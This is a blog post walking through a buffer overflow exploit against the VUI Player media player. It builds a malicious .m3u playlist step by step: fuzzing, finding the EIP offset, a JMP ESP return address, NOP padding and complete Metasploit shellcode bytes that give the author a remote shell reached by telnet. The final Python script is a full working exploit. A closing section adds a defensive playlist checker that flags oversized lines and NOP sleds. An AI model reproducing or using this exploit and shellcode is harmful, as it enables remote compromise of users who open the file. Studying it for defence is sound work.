Tuesday, February 14, 2012

Trying to Exploit VUI Player Via Buffer Overflow Vulnerability

First I try to create a fuzzer


...........................
buffer = "\x41" * 1500
filename = "vui" + ".m3u"
file = open(filename,"w")
file.writelines(buffer)
file.close()
...........................

I save it as fuzzvui.py and run it with python; it crashes VUI Player as expected..

Then I generate a unique character pattern with pattern_create, replace the buffer with it, and use pattern_offset to find at which character offset EIP is overwritten. After that I make sure EIP is really overwritten by changing the fuzzer script.

----------------------------
buffer = "\x90" * 1012
buffer += "\xD7\x30\x9D\x7C"
buffer += ("\xd9\xd0\xd9\x74\x24\xf4\xb8\xea\x72\xcc\xd2\x5b\x31\xc9\xb1\x51"
"\x31\x43\x17\x03\x43\x17\x83\x01\x8e\x2e\x27\x29\x05\x44\x85\x39"
"\x23\x65\xe9\x46\xb4\x11\x7a\x9c\x11\xad\xc6\xe0\xd2\xcd\xcd\x60"
"\xe4\xc2\x45\xdf\xfe\x97\x05\xff\xff\x4c\xf0\x74\xcb\x19\x02\x64"
"\x05\xde\x9c\xd4\xe2\x1e\xea\x23\x2a\x54\x1e\x2a\x6e\x82\xd5\x17"
"\x3a\x71\x3e\x12\x27\xf2\x61\xf8\xa6\xee\xf8\x8b\xa5\xbb\x8f\xd4"
"\xa9\x3a\x7b\xe9\xfd\xb7\xf2\x81\xd9\xdb\x65\x9a\x13\x3f\x01\x97"
"\x17\x8f\x41\xe7\x9b\x64\x25\xfb\x0e\xf1\x86\x0b\x0f\x6e\x89\x45"
"\xa1\x82\xc5\xa6\x6b\x3c\xb5\x3e\xfc\xf2\x0b\xd6\x8b\x87\x59\x79"
"\x20\x97\x4e\xed\x03\x8a\x93\xd6\xc3\xaa\xba\x77\x6d\xb1\x25\x06"
"\x80\x32\xa8\x5d\x31\x41\x53\x8d\xad\x9c\xa2\xd8\x83\x48\x4a\xf4"
"\x8f\x25\xe7\xab\x7c\x89\x54\x08\xd0\xf2\x8b\xe8\xbe\x1d\x70\x92"
"\x6d\x97\x69\xcf\xfa\x03\x73\x9f\x3d\x1c\x7b\x89\xa8\xb3\xd2\x60"
"\xd2\x64\xbc\x2e\x81\xab\xd4\x79\x25\x65\x75\xd0\x26\x5a\x12\x3f"
"\x91\xdd\xaa\xe8\xdd\x34\x7c\x42\x76\xec\x82\xba\xe5\x66\x9a\x43"
"\xcc\x0e\x33\x4c\x06\xa5\x44\x62\xc1\x2c\xdf\xe4\x66\xd2\x72\x61"
"\x93\x7e\xdd\x28\x75\xb3\x54\x2d\xef\x0f\xee\x53\xc1\x4f\x03\x39"
"\xdc\x12\xc9\xc3\x63\xbf\x82\xb6\x1e\x87\x0f\x63\x75\x9f\x3d\x8d"
"\x39\x76\x3d\x04\x7a\x88\x17\xbd\xd5\x24\xc9\x10\x8b\xa2\xe8\xc3"
"\x7a\x66\xba\x1c\xac\xe0\x91\x3b\x48\x3f\xba\x44\x85\xd5\xc2\x45"
"\x1d\xd5\xed\x32\x35\xd5\x8d\x80\xde\xda\x44\x5a\xe0\xf5\x01\x24"
"\xc6\x14\xa2\x8b\x09\x0e\xba\xfb")
filename = "vuiploit2" + ".m3u"
file = open(filename,"w")
file.writelines(buffer)
file.close()
----------------------------

I run it and load the .m3u file in VUI Player attached to OllyDbg. It works.

But if I change the fuzzer script to create an .m3u file that exploits Windows via VUI Player, it does not work..

Ok, let's analyze the memory address..

Let's change the fuzzer script to:
...........................
buffer = "\x90" * 900
buffer += "\x90" * 20
buffer += "\x90" * 30
buffer += "\x41" * 20
buffer += "\x42" * 32
buffer += "\xD7\x30\x9D\x7C"
buffer += "\xCC" * 300
filename = "vuimem" + ".m3u"
file = open(filename,"w")
file.writelines(buffer)
file.close()
...........................

This is to see what happens to EIP when we try to overwrite it with the JMP ESP address..


Let's try again with a breakpoint at the JMP ESP address

The same thing happens; the breakpoint does not trigger..
Let's change the fuzzer script again

.......................................
buffer = "\x90" * 900
buffer += "\x90" * 20
buffer += "\x90" * 30
buffer += "\x41" * 20
buffer += "\x42" * 32
buffer += "\xD7\x30\x9D\x7C"
buffer += "\x41" * 300
filename = "vuimem" + ".m3u"
file = open(filename,"w")
file.writelines(buffer)
file.close()
.......................................
And set the breakpoint. Unfortunately the breakpoint still does not trigger...

Change the fuzzer script again. We try to add space between the EIP address and the stack ...

.......................................
buffer = "\x90" * 1012
buffer += "\xD7\x30\x9D\x7C"
buffer += "\x41" * 300
filename = "vuimem" + ".m3u"
file = open(filename,"w")
file.writelines(buffer)
file.close()
.......................................
We also set a breakpoint at the JMP ESP memory address

.......................................
buffer = "\x90" * 1012
buffer += "\xD7\x30\x9D\x7C"
buffer += "\x90" * 32
buffer += "\xCC" * 32
filename = "vuimem" + ".m3u"
file = open(filename,"w")
file.writelines(buffer)
file.close()
.......................................


OK, it works when we add "\x90" (NOP, No Operation) padding between EIP and the stack.

So, let's try it with the Metasploit shellcode to exploit the Windows OS (the detailed steps to create it are in the previous article)

.......................................
buffer = "\x90" * 1012
buffer += "\xD7\x30\x9D\x7C"
buffer += "\x90" * 32
buffer += ("\xd9\xd0\xd9\x74\x24\xf4\xb8\xea\x72\xcc\xd2\x5b\x31\xc9\xb1\x51"
"\x31\x43\x17\x03\x43\x17\x83\x01\x8e\x2e\x27\x29\x05\x44\x85\x39"
"\x23\x65\xe9\x46\xb4\x11\x7a\x9c\x11\xad\xc6\xe0\xd2\xcd\xcd\x60"
"\xe4\xc2\x45\xdf\xfe\x97\x05\xff\xff\x4c\xf0\x74\xcb\x19\x02\x64"
"\x05\xde\x9c\xd4\xe2\x1e\xea\x23\x2a\x54\x1e\x2a\x6e\x82\xd5\x17"
"\x3a\x71\x3e\x12\x27\xf2\x61\xf8\xa6\xee\xf8\x8b\xa5\xbb\x8f\xd4"
"\xa9\x3a\x7b\xe9\xfd\xb7\xf2\x81\xd9\xdb\x65\x9a\x13\x3f\x01\x97"
"\x17\x8f\x41\xe7\x9b\x64\x25\xfb\x0e\xf1\x86\x0b\x0f\x6e\x89\x45"
"\xa1\x82\xc5\xa6\x6b\x3c\xb5\x3e\xfc\xf2\x0b\xd6\x8b\x87\x59\x79"
"\x20\x97\x4e\xed\x03\x8a\x93\xd6\xc3\xaa\xba\x77\x6d\xb1\x25\x06"
"\x80\x32\xa8\x5d\x31\x41\x53\x8d\xad\x9c\xa2\xd8\x83\x48\x4a\xf4"
"\x8f\x25\xe7\xab\x7c\x89\x54\x08\xd0\xf2\x8b\xe8\xbe\x1d\x70\x92"
"\x6d\x97\x69\xcf\xfa\x03\x73\x9f\x3d\x1c\x7b\x89\xa8\xb3\xd2\x60"
"\xd2\x64\xbc\x2e\x81\xab\xd4\x79\x25\x65\x75\xd0\x26\x5a\x12\x3f"
"\x91\xdd\xaa\xe8\xdd\x34\x7c\x42\x76\xec\x82\xba\xe5\x66\x9a\x43"
"\xcc\x0e\x33\x4c\x06\xa5\x44\x62\xc1\x2c\xdf\xe4\x66\xd2\x72\x61"
"\x93\x7e\xdd\x28\x75\xb3\x54\x2d\xef\x0f\xee\x53\xc1\x4f\x03\x39"
"\xdc\x12\xc9\xc3\x63\xbf\x82\xb6\x1e\x87\x0f\x63\x75\x9f\x3d\x8d"
"\x39\x76\x3d\x04\x7a\x88\x17\xbd\xd5\x24\xc9\x10\x8b\xa2\xe8\xc3"
"\x7a\x66\xba\x1c\xac\xe0\x91\x3b\x48\x3f\xba\x44\x85\xd5\xc2\x45"
"\x1d\xd5\xed\x32\x35\xd5\x8d\x80\xde\xda\x44\x5a\xe0\xf5\x01\x24"
"\xc6\x14\xa2\x8b\x09\x0e\xba\xfb")
filename = "vuiploit" + ".m3u"
file = open(filename,"w")
file.writelines(buffer)
file.close()
.......................................

Now, let's open vuiploit.m3u, created by the fuzzer, in VUI Player.

Then, we try to telnet to the target ...

Ok, we have done it successfully ...
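The defensive side of what this post shows: every payload above is a single playlist line that is far longer than any real path or URL and is mostly padding (runs of 0x90 NOPs or 0xCC INT3s). A player or a download gateway can refuse such a file before a fixed-size buffer copy ever sees it. The script below is an added example, not code from the original post; the limits MAX_ENTRY_LEN and SLED_RUN are assumptions, and the two playlists at the bottom are constructed inline (the suspicious one mirrors the vuimem.m3u layout from the post, with a placeholder "AAAA" where the overwritten return address would sit).

```python
# Added example (not from the original post): a defensive .m3u checker.
# It scans every line of a playlist for the traits of the overflow payloads
# built in this post and refuses to load a playlist that shows any of them.
import re

MAX_ENTRY_LEN = 1024   # assumption: generous upper bound for a real path/URL line
SLED_RUN = 16          # assumption: this many consecutive NOP/INT3 bytes is a sled


def check_m3u_entry(entry: bytes) -> list:
    """Return a list of findings for one playlist line (empty list = looks normal)."""
    findings = []
    if len(entry) > MAX_ENTRY_LEN:
        findings.append("oversized entry (%d bytes)" % len(entry))
    if re.search(rb"\x90{%d,}" % SLED_RUN, entry):
        findings.append("NOP sled")
    if re.search(rb"\xcc{%d,}" % SLED_RUN, entry):
        findings.append("INT3 run")
    # Control bytes (other than tab) never belong in a path or URL line.
    # Bytes >= 0x80 are allowed because UTF-8 file names are legitimate.
    controls = sum(1 for b in entry if b < 0x20 and b != 0x09)
    if controls:
        findings.append("%d control bytes" % controls)
    return findings


def scan_m3u(data: bytes) -> list:
    """Return [(line_number, findings), ...] for every suspicious line."""
    report = []
    for lineno, raw in enumerate(data.split(b"\n"), start=1):
        line = raw.rstrip(b"\r")
        if not line:
            continue
        findings = check_m3u_entry(line)
        if findings:
            report.append((lineno, findings))
    return report


def load_m3u_safely(data: bytes) -> list:
    """Hardened loader: reject the whole file if any line is suspicious,
    otherwise return the media entries (comment/directive lines dropped)."""
    report = scan_m3u(data)
    if report:
        raise ValueError("rejected playlist: %r" % report)
    entries = []
    for raw in data.split(b"\n"):
        line = raw.rstrip(b"\r")
        if line and not line.startswith(b"#"):
            entries.append(line.decode("utf-8", errors="replace"))
    return entries


def is_accepted(data: bytes) -> bool:
    """Convenience wrapper: True if the loader accepts the playlist."""
    try:
        load_m3u_safely(data)
        return True
    except ValueError:
        return False


# Constructed sample inputs (not real files from the post or from any player).
BENIGN = (b"#EXTM3U\r\n"
          b"#EXTINF:123,Song\r\n"
          b"C:\\Music\\song.mp3\r\n"
          b"http://example.invalid/stream.mp3\r\n")

# Mirrors the vuimem.m3u layout above: 1012 NOPs, 4 placeholder bytes where
# the return address would be, 32 NOPs, then 32 INT3 breakpoints.
SUSPICIOUS = b"\x90" * 1012 + b"AAAA" + b"\x90" * 32 + b"\xcc" * 32

if __name__ == "__main__":
    print("benign  :", scan_m3u(BENIGN), load_m3u_safely(BENIGN))
    print("payload :", scan_m3u(SUSPICIOUS), "accepted" if is_accepted(SUSPICIOUS) else "rejected")
```

The length check alone would already stop the fuzzer's 1500-byte "A" line; the sled and control-byte checks catch a payload that has been trimmed under the length limit. The real fix inside the player is the same rule applied at the copy: bound every line by the destination buffer size instead of copying until the newline.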

